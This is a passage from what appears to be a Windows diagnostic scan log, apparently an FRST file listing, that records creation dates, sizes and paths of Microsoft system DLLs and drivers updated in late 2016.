(Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll 2016-11-09 14:24 - 2016-11-02 10:16 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\lpk.dll 2016-11-09 14:24 - 2016-11-02 10:16 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dciman32.dll 2016-11-09 14:24 - 2016-11-02 09:53 - 00034304 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll 2016-11-09 14:24 - 2016-10-27 22:59 - 00394440 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll 2016-11-09 14:24 - 2016-10-27 22:14 - 00346320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll 2016-11-09 14:24 - 2016-10-27 14:13 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb 2016-11-09 14:24 - 2016-10-27 14:13 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll 2016-11-09 14:24 - 2016-10-27 13:55 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll 2016-11-09 14:24 - 2016-10-27 13:54 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec 2016-11-09 14:24 - 2016-10-27 13:54 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll 2016-11-09 14:24 - 2016-10-27 13:53 - 00576000 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll 2016-11-09 14:24 - 2016-10-27 13:53 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll 2016-11-09 14:24 - 2016-10-27 13:51 - 02896384 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2016-11-09 14:24 - 2016-10-27 13:44 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll 2016-11-09 14:24 - 2016-10-27 13:43 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll 2016-11-09 14:24 - 2016-10-27 13:38 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll 2016-11-09 14:24 - 2016-10-27 13:37 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll 2016-11-09 14:24 - 2016-10-27 13:37 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll 2016-11-09 14:24 - 2016-10-27 13:37 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe 2016-11-09 14:24 - 2016-10-27 13:37 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe 2016-11-09 14:24 - 2016-10-27 13:28 - 25763328 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2016-11-09 14:24 - 2016-10-27 13:28 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe 2016-11-09 14:24 - 2016-10-27 13:24 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll 2016-11-09 14:24 - 2016-10-27 13:19 - 06047744 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll 2016-11-09 14:24 - 2016-10-27 13:15 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll 2016-11-09 14:24 - 2016-10-27 13:13 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll 2016-11-09 14:24 - 2016-10-27 13:09 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll 2016-11-09 14:24 - 2016-10-27 13:08 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll 2016-11-09 14:24 - 2016-10-27 13:05 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll 2016-11-09 14:24 - 2016-10-27 13:02 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll 2016-11-09 14:24 - 2016-10-27 12:49 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll 2016-11-09 14:24 - 2016-10-27 12:46 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2016-11-09 14:24 - 2016-10-27 12:46 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe 2016-11-09 14:24 - 2016-10-27 12:44 - 02131456 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2016-11-09 14:24 - 2016-10-27 12:44 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll 2016-11-09 14:24 - 2016-10-27 12:17 - 15257088 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2016-11-09 14:24 - 2016-10-27 12:16 - 02920448 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2016-11-09 14:24 - 2016-10-27 12:03 - 01543680 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll 2016-11-09 14:24 - 2016-10-27 11:54 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll 2016-11-09 14:24 - 2016-10-27 10:05 - 20304896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll 2016-11-09 14:24 - 2016-10-25 10:02 - 03219456 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys 2016-11-09 14:24 - 2016-10-22 12:54 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb 2016-11-09 14:24 - 2016-10-22 12:36 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll 2016-11-09 14:24 - 2016-10-22 12:36 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll 2016-11-09 14:24 - 2016-10-22 12:35 - 00498688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll 2016-11-09 14:24 - 2016-10-22 12:35 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec 2016-11-09 14:24 - 2016-10-22 12:34 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll 2016-11-09 14:24 - 2016-10-22 12:27 - 02287616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll 2016-11-09 14:24 - 2016-10-22 12:27 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll 2016-11-09 14:24 - 2016-10-22 12:26 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll 2016-11-09 14:24 - 2016-10-22 12:22 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll 2016-11-09 14:24 - 2016-10-22 12:21 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll 2016-11-09 14:24 - 2016-10-22 12:21 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe 2016-11-09 14:24 - 2016-10-22 12:20 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll 2016-11-09 14:24 - 2016-10-22 12:09 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll 2016-11-09 14:24 - 2016-10-22 12:04 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll 2016-11-09 14:24 - 2016-10-22 12:03 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll 2016-11-09 14:24 - 2016-10-22 11:59 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll 2016-11-09 14:24 - 2016-10-22 11:58 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll 2016-11-09 14:24 - 2016-10-22 11:56 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll 2016-11-09 14:24 - 2016-10-22 11:54 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll 2016-11-09 14:24 - 2016-10-22 11:46 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll 2016-11-09 14:24 - 2016-10-22 11:45 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll 2016-11-09 14:24 - 2016-10-22 11:44 - 04608000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll 2016-11-09 14:24 - 2016-10-22 11:43 - 02055680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl 2016-11-09 14:24 - 2016-10-22 11:43 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll 2016-11-09 14:24 - 2016-10-22 11:30 - 13654016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll 2016-11-09 14:24 - 2016-10-22 11:12 - 02444800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll 2016-11-09 14:24 - 2016-10-22 11:09 - 01312256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll 2016-11-09 14:24 - 2016-10-22 11:09 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll 2016-11-09 14:24 - 2016-10-15 10:31 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll 2016-11-09 14:24 - 2016-10-15 10:31 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll 2016-11-09 14:24 - 2016-10-15 10:13 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll 2016-11-09 14:24 - 2016-10-15 10:13 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll 2016-11-09 14:24 - 2016-10-11 10:37 - 00370920 _____ (Microsoft Corporation) C:\Windows\system32\clfs.sys 2016-11-09 14:24 - 2016-10-11 10:31 - 01148416 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10.IME 2016-11-09 14:24 - 2016-10-11 10:31 - 01068544 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll 2016-11-09 14:24 - 2016-10-11 10:31 - 00878080 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10K.DLL 2016-11-09 14:24 - 2016-10-11 10:31 - 00457216 _____ (Microsoft Corporation) C:\Windows\system32\imkr80.ime 2016-11-09 14:24 - 2016-10-11 10:31 - 00246784 _____ (Microsoft Corporation) C:\Windows\system32\input.dll 2016-11-09 14:24 - 2016-10-11 10:31 - 00176128 _____ (Microsoft Corporation) C:\Windows\system32\tintlgnt.ime 2016-11-09 14:24 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\quick.ime 2016-11-09 14:24 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\qintlgnt.ime 2016-11-09 14:24 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\phon.ime 2016-11-09 14:24 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\cintlgnt.ime 2016-11-09 14:24 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\chajei.ime 2016-11-09 14:24 - 2016-10-11 10:31 - 00132608 _____ (Microsoft Corporation) C:\Windows\system32\pintlgnt.ime 2016-11-09 14:24 - 2016-10-11 10:18 - 01027584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IMJP10.IME 2016-11-09 14:24 - 2016-10-11 10:18 - 00829952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll 2016-11-09 14:24 - 2016-10-11 10:18 - 00701440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IMJP10K.DLL 2016-11-09 14:24 - 2016-10-11 10:18 - 00430080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imkr80.ime 2016-11-09 14:24 - 2016-10-11 10:18 - 00202240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\input.dll 2016-11-09 14:24 - 2016-10-11 10:18 - 00126976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tintlgnt.ime 2016-11-09 14:24 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quick.ime 2016-11-09 14:24 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qintlgnt.ime 2016-11-09 14:24 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\phon.ime 2016-11-09 14:24 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cintlgnt.ime 2016-11-09 14:24 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\chajei.ime 2016-11-09 14:24 - 2016-10-11 10:18 - 00090112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pintlgnt.ime 2016-11-09 14:24 - 2016-10-11 08:33 - 00187392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIAnimation.dll 2016-11-09 14:24 - 2016-10-11 08:06 - 00221184 _____ (Microsoft Corporation) C:\Windows\system32\UIAnimation.dll 2016-11-09 14:24 - 2016-10-10 10:38 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys 2016-11-09 14:24 - 2016-10-10 10:38 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys 2016-11-09 14:24 - 2016-10-10 10:34 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll 2016-11-09 14:24 - 2016-10-10 10:34 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll 2016-11-09 14:24 - 2016-10-10 10:34 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll 2016-11-09 14:24 - 2016-10-10 10:34 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 01462272 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll 2016-11-09 14:24 - 2016-10-10 10:33 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll 2016-11-09 14:24 - 2016-10-10 10:16 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll 2016-11-09 14:24 - 2016-10-10 10:02 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe 2016-11-09 14:24 - 2016-10-10 09:56 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys 2016-11-09 14:24 - 2016-10-10 09:55 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys 2016-11-09 14:24 - 2016-10-10 09:55 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys 2016-11-09 14:24 - 2016-10-10 09:55 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe 2016-11-09 14:24 - 2016-10-10 09:54 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe 2016-11-09 14:24 - 2016-10-10 09:50 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll 2016-11-09 14:24 - 2016-10-07 10:40 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi 2016-11-09 14:24 - 2016-10-07 10:37 - 05547752 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe 2016-11-09 14:24 - 2016-10-07 10:37 - 00706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi 2016-11-09 14:24 - 2016-10-07 10:35 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 03649536 _____ (Microsoft Corporation) C:\Windows\system32\MSVidCtl.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00877056 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:18 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe 2016-11-09 14:24 - 2016-10-07 10:18 - 03944680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe 2016-11-09 14:24 - 2016-10-07 10:15 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 02291712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSVidCtl.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00581632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll 2016-11-09 14:24 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll 2016-11-09 14:24 - 